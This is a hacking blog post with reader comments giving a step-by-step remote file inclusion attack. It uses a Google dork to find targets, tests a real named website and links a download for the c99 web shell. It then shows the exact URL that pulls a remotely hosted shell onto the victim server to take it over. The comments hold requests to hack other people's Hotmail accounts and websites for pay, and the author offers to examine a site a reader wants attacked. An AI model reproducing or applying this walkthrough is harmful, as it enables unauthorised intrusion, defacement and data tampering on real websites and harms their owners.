Hack a Website Using Remote File Inclusion
Remote file inclusion is basically a one of the most common vulnerability found in web application. This type of vulnerability allows the Hacker or attacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on it.
Searching the Vulnerability
Remote File inclusion vulnerability is usually occured in those sites which have a navigation similar to the below one
www.Targetsite.com/index.php?page=Anything
To find the vulnerability the hacker will most commonly use the following Google Dork
“inurl:index.php?page=”
This will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command
www.targetsite.com/index.php?page=www.google.com
Lets say that the target website is http://www.cbspk.com
So the hacker url will become
http://www.cbspk.com/v2/index.php?page=http://www.google.com
If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack
Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:
http://www.4shared.com/file/107930574/287131f0/c99shell.html?aff=7637829
The hacker would first upload the shells to a webhosting site such as ripway.com, 110mb.com etc.
Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is
http://h1.ripway.com/rafaybaloch/c99.txt
Now here is how a hacker would execute the following command to gain access
http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/rafaybaloch/c99.txt?
Remember to add “?” at the end of url or else the shell will not execute. Now the hacker is inside the website and he could do anything with it
About the Author
This is a guest post by Rafay baloch. Rafay Baloch is a the founder of Rafay Hacking Articles and the writer of the book A Beginners Guide To Ethical Hacking
Popularity: 4% [?]
You might be interested in the following Articles
- Making your own trojan in a .bat file
- Delete an “UnDeletable” File
- How to Spy on a Remote PC
- Installing a Keylogger on a Remote Machine
- XSS Cross Site Scripting Attack
- Are you Vulnerable to Shell or SQL Injection?
- Remote Operating System Detection
- How to Control a Remote Computer using Lost Door
Enjoyed this article? Subscribe to Hacking Truths and get daily updates about new cool websites and programs in your email for free.



One of the finest Articles on Hungry Hackers Thanks you rock!
Is there ANYONE out there willing to hack a hotmail account for me? I have spent soooooo mcuh time and money this past month trying to obtain a good software which will enable access to Hotmail via remote installation or whatever and just NOTHING works-I purchased software from soy-tech…..it was infected…I am sick of going around in cicrles when all I really need is one competent kind person willing to spare 5 minutes of their time who KNOWS how to Hack Hotamil to get my potential-spouses password for me.
nothing too sinister-about to invest in a home with someone and a recent overheard phone call to their ex has cast doubt on the authenticity of their intentions. I have been ripped off financially before, want to judt double check this time and I knwo they email their ex a lot which I was always okay with-now I wish to double check first.
anyone willing to help???
@Alex Chapman
Kindly ask questions Related to the Topic!
hii.
http://www.cbspk.com/v2/index.php?page=http://www.google.com –in this url why /v2 is added??
Awesome hack!@!
ohh….got it now..y /v2 is thr…
Our company website was attacked 3months ago using a C99.txt file hosted on a remote website of the hacker. Our MYSQL database was modified. Lame messages was posted in our website. Hope you post the prevention methods can be used to avoid this attack.
@Glenn
I will soon post prevention methods too
[...] now you might be knowing Rafay Baloch the writer of the previous article “Hack a Website Using Remote File Inclusion” and I am sure you would like to have more hacking stuff from him. Well now you don’t [...]
Good Article..
nicee stufff …
make some video tutorials man
It have a problem … when i exec c99shell.txt? i cant do anything but when i exec c99shell.php? i can do what i want but on the remote webhost and not on the victim site … why ?
@PiM use the Host To Modify. So You Will Have Access To The Vic
good now u have removed ur personal number from u domain whois ….
atleast u have learned something….. take care … ill be watching u.. joking no worries ….
i want to learn hayking ….. please
guess that the author him self is commenting ;p I (hyker hayked )
I dont know buddy what do you want to prove?
You have quesions I will answer it, but I dont have time for answering the useless jokes
Look bro i don’t want to prove any thing alrite …. i just want u to be the best .. i am so proud that paki boy is representing his country great …. but there are some flaws that u should cover thats all … even this website got a problem ….. for no reason i am the author ;p …. Wish u all the best for ur future …
Hack a Website Using Remote File Inclusion post for thanx.
@Dot Dot Dot
Its the owners responsibility to look after his site not mine buddy and the owner is a very good friend of mine I will surely tell him about this
Nice Article For NewBies
I m also from guj..
u can contact me on mail if u want.
thanks.
Dear Rafay Baloch ,
We want to hack a website , which is spreading malacious things about us.
But when we are trying to use your technique it is giving the following command
You may not be able to visit this page because of:
an out-of-date bookmark/favourite
a search engine that has an out-of-date listing for this site
a mistyped address
you have no access to this page
The requested resource was not found.
An error has occurred while processing your request.
Please try one of the following pages:
Can you please help?
Regards
Spirited
@Spirited
Kindly send the url of the website and I will have a check
Hello author!
I am able to do this and it prints inside the site but the shell doesn’t work.
http://domain.com/browse.php?type=
hey i did not understand
http://www.cbspk.com/v2/index.php?page=http:/v2/www.google.com
y this “v2″ is written
please explain…….
hey i tried RFI on cbspk…but its not wrking der….showin me the followin error….
Warning: file(http://asbestos.0fees.net/c99shell.txt?) [function.file]: failed to open stream: HTTP request failed! HTTP/1.0 403 Forbidden in \\NAWINFS04\home\users\web\b2672\rh.charesh\v2\index.php on line 14
Warning: Invalid argument supplied for foreach() in \\NAWINFS04\home\users\web\b2672\rh.charesh\v2\index.php on line 15
can u plz help me out wid this..??
i hav also tried to search any oder website but was nt able to find ny website dats vulnerable by RFI….!!
cant download c99shel. my anti virus detect it as a virus.
Is it possible for somebody (let’s say the webmaster) to trace your IP address or other kind of information related to the computer your using when doing this?
Its not working….tryin to execute c99.txt its not working and when i execute c9.php on my server it works but not works for the victims site….please make it working
hy any body tell me taht how to hack a web.
dear sir tell me how to see or view sam file of windows
Can anyone tell me how to hack http://www.cellufun.com I realy need help!
@rafay can u help me out i need to hack a website and im willing to pay email me at [email protected] so that we can discuss my proposal
[...] Hack a Website Using Remote File Inclusion [...]
Need urgently help to hyck website. Can hire some1 to teach and perform the job. [email protected] only serious hyckers pls.
Hack a Website Using Remote File Inclusion post for thanx.
dear sir tell me how to see or view sam file of windows
how can we find the vulnerablity of a specific site to be hacked…n what type of attack can be best suited on it ….
also can u tell me hao can i be traced back n precautions to be taken while hacking a site……
It wont let me even upload this to my server! Says I need to get administrative permission. Does this mean..
1) I need to find a file host company that doesn’t care about what you upload or
2) I need to make some sort of temporary hosting storage?
Thanks for your time.
excellent tutorial.
Note : If you have any Query related to the above Article please Post it to the Support Forum.
Leave your response!
Popular Posts
Follow Me
Free SMS Alerts
For Indian Users
Send START HACKING <cityname> to 575758
* for more info click here
Recent Posts
Most Commented
Categories
Archives
Translator
Introducing Myself
Blogroll